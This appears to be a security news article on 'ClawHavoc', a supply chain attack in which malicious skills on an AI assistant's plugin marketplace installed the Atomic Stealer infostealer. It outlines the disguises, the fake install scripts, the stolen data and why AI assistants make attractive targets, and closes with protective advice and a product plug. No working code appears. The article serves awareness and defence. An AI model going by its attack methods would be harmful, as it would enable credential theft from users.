12% of This AI Assistant's Plugin Marketplace Was Malware—341 Skills Were Stealing Your Passwords

The Attack

Researchers discovered a supply chain attack dubbed "ClawHavoc" targeting the OpenClaw AI assistant ecosystem. After auditing 2,857 skills on ClawHub, the platform's plugin marketplace, they found 341 were malicious. That is roughly one in eight plugins designed to steal user data rather than perform their advertised function.

The primary payload was Atomic Stealer (AMOS), a commodity macOS infostealer available on criminal marketplaces for $500 to $1,000 per month. Once installed, AMOS harvests browser passwords, keychain data, cryptocurrency wallet private keys, SSH credentials, API tokens, and environment variables.

The attackers targeted macOS specifically because many developers and power users run OpenClaw on Mac Minis as persistent, always on AI assistants, giving the malware continuous access to sensitive data.

How the Malicious Skills Worked

The 341 malicious skills used several disguises to appear legitimate:

• Typosquats: Names like "clawhub," "clawhubb," and "clawwhub" that mimicked the official platform
• Cryptocurrency tools: Fake Solana wallet managers, Ethereum gas trackers, and Polymarket trading bots
• Utility plugins: YouTube downloaders, auto updaters, and social media tools
• Finance apps: Portfolio trackers and exchange integrations

Each malicious skill included professional documentation and fake prerequisite instructions. On macOS, victims were directed to copy an installation script from a code sharing site and execute it in Terminal. The script contained obfuscated shell commands that fetched the AMOS payload from command and control infrastructure. On Windows, users were told to download a ZIP file from GitHub containing trojaned software with keylogging capabilities.

Some of the more sophisticated entries concealed reverse shell backdoors within otherwise functional code, making them harder to detect during casual review.

The "Lethal Trifecta"

Researchers described OpenClaw's architecture as creating a "lethal trifecta" for supply chain attacks. The AI assistant has three properties that together make it an ideal attack vector:

• Persistent memory: The assistant retains context across sessions, meaning malicious skills can establish long term access and execute delayed attacks
• Access to private data: Skills can read local files, environment variables, and stored credentials that the assistant has access to
• External communication: The assistant can make network requests, allowing stolen data to be exfiltrated to attacker controlled servers

The barrier to publishing on ClawHub was minimal: attackers only needed a GitHub account that was at least one week old. No code review, no security audit, no vetting process stood between a malicious skill and the marketplace.

A Pattern Across AI Ecosystems

ClawHavoc is not an isolated incident. It follows a pattern of supply chain attacks targeting developer and AI tool ecosystems:

• Malicious VS Code extensions with 1.5 million installs were caught sending source code to external servers
• Compromised Chrome extensions disguised as AI assistants affected 300,000 users
• Fake npm and PyPI packages have been used to distribute infostealers through developer supply chains for years

The common thread is trust. Developers install extensions and plugins from marketplaces assuming some baseline of security review exists. In many cases, it does not. The marketplace model that makes AI assistants extensible also makes them exploitable.

What Was Stolen

The AMOS infostealer deployed through ClawHavoc harvested:

• Browser saved passwords from Chrome, Firefox, and Safari
• macOS Keychain entries including WiFi passwords, certificates, and stored credentials
• Cryptocurrency wallet private keys and seed phrases
• SSH keys used for server access
• API keys and exchange credentials
• Bot environment variables stored in configuration files

For developers who run AI assistants on machines that also hold production credentials, the breach surface is extensive. A single compromised skill could provide access to cloud infrastructure, source code repositories, and financial accounts.

How to Protect Yourself

If you use AI assistants with plugin ecosystems, treat every third party skill as untrusted code:

• Audit installed skills and remove any that you did not explicitly seek out or that have suspicious names
• Never execute terminal commands from plugin installation instructions without reading them first
• Isolate AI assistants from machines holding production credentials, API keys, or cryptocurrency wallets
• Rotate credentials if you installed any skill from an untrusted source, as your passwords and keys may already be compromised

The same vigilance applies to your inbox. Phishing emails are increasingly the first step in supply chain compromises, using tracking pixels to identify active targets and social engineering to deliver malicious payloads. Blocking spy pixels with tools like Gblock removes one of the signals attackers use to decide who to target next.